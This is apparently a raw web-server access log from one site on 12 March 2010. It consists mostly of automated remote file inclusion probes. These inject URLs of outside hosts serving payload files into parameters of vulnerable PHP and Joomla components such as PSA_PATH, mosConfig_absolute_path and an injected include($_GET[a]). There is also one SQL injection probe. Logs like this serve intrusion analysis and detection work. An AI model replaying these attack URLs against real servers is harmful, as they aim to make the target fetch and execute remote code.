72.233.114.90 - - [12/Mar/2010:09:13:15 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:15 -0800] "GET /logs/access_081208.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:13:15 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:13:16 -0800] "GET /logs/access_080706.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:16 -0800] "GET /logs/access_081208.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:16 -0800] "GET /logs/access_090730.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:16 -0800] "GET /logs/access_090730.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:16 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:16 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:16 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:13:16 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:13:19 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:21 -0800] "GET /logs/access_081208.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:21 -0800] "GET /logs/access_090730.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:21 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:21 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:21 -0800] "GET /logs/access_081208.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:21 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:21 -0800] "GET /logs/access_090730.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:13:21 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:13:31 -0800] "GET /logs/access_080706.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:13:31 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.46.195.227 - - [12/Mar/2010:09:13:36 -0800] "GET /presto/?D=D HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
204.202.2.23 - - [12/Mar/2010:09:13:47 -0800] "GET /logs/index.php?error=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.202.2.23 - - [12/Mar/2010:09:13:47 -0800] "GET /logs/access_091031.log%20%20/index.php?error=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [12/Mar/2010:09:13:48 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.1; http://dmulk.com/blog" "dmulk.com"
204.202.2.23 - - [12/Mar/2010:09:13:48 -0800] "GET /index.php?error=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 200 14983 "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:09:13:51 -0800] "GET /logs/access_091031.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:13:51 -0800] "GET /logs/access_080320.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:13:53 -0800] "GET /logs/access_080320.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:14:03 -0800] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:14:16 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:14:16 -0800] "GET /logs/access_090425.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:14:16 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:14:16 -0800] "GET /logs/access_080622.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:14:21 -0800] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:14:24 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:14:24 -0800] "GET /logs/access_090425.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:14:24 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:14:24 -0800] "GET /logs/access_080622.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:14:47 -0800] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:14:47 -0800] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:14:47 -0800] "GET /logs/access_080623.log%20%20/admincp/auth/checklogin.php?cfgProgDir=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:14:58 -0800] "GET /logs/access_090424.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:15:03 -0800] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.202.2.23 - - [12/Mar/2010:09:15:13 -0800] "GET /logs/access_081230.log%20%20/index.php?error=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:15:16 -0800] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.158.145.27 - - [12/Mar/2010:09:15:29 -0800] "GET /logs/access.log HTTP/1.1" 200 233533 "-" "Yandex/1.01.001 (compatible; Win16; I)" "dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:15:32 -0800] "GET /logs/access_090424.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:15:52 -0800] "GET /logs/access_100216.log/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:16:03 -0800] "GET /logs/access_080530.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:16:04 -0800] "GET /logs/access_080530.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:16:06 -0800] "GET /logs/access_100216.log/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:16:07 -0800] "GET /logs/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 200 142825 "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:16:07 -0800] "GET ////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 200 15132 "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:16:08 -0800] "GET /logs/access_080530.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:16:29 -0800] "GET /logs/access_090208.log%20%20/admincp/auth/checklogin.php?cfgProgDir=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:16:43 -0800] "GET /logs/access_081026.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.205.50.6 - - [12/Mar/2010:09:16:53 -0800] "GET /logs/access_080721.log/playing.php/common/db.php?commonpath=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.205.50.6 - - [12/Mar/2010:09:16:54 -0800] "GET /logs/access_080609.log/playing.php/common/db.php?commonpath=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.209 - - [12/Mar/2010:09:16:57 -0800] "GET /logs/access_090506.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:17:40 -0800] "GET /logs/access_090903.log//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:17:40 -0800] "GET /components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:17:41 -0800] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
222.239.227.209 - - [12/Mar/2010:09:17:55 -0800] "GET /logs/access_090405.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:18:11 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:18:11 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:18:11 -0800] "GET /logs/access_091228.log//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:18:45 -0800] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:18:45 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:18:46 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
86.109.165.223 - - [12/Mar/2010:09:18:48 -0800] "GET /product.php?id=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:18:52 -0800] "GET /logs/access_090903.log//modules/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:18:53 -0800] "GET /modules/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:18:53 -0800] "GET /logs//modules/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:18:56 -0800] "GET /logs/access.log//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:18:58 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:18:58 -0800] "GET /logs/access_080316.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:18:59 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:18:59 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:19:01 -0800] "GET /logs/access_080316.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:19:01 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:19:02 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:19:02 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:19:03 -0800] "GET /logs/access_091228.log//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:09:19:03 -0800] "GET /bikes/dteel/2008_09_19/?S=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.115.224 - - [12/Mar/2010:09:19:16 -0800] "GET /blog/index.php/2008/10/ HTTP/1.0" 200 11765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:28 -0800] "GET /logs/access_090516.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:28 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:19:32 -0800] "GET /logs/access_091021.log//include/setup.php?dir=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:36 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:36 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:36 -0800] "GET /logs/access_090516.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:36 -0800] "GET /logs/access_091122.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:19:41 -0800] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:19:43 -0800] "GET /logs/access_100228.log//include/setup.php?dir=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:45 -0800] "GET /logs/access_090516.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:46 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:46 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:48 -0800] "GET /logs/access_091122.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:48 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:48 -0800] "GET /logs/access_090516.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:19:50 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:19:50 -0800] "GET /logs/access_090715.log//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:19:50 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:19:50 -0800] "GET /logs/access.log//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:51 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:52 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:52 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:52 -0800] "GET /logs/access_090516.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:19:52 -0800] "GET /logs/access_091122.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:02 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:02 -0800] "GET /logs/access_090516.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:02 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:05 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:05 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:05 -0800] "GET /logs/access_090516.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
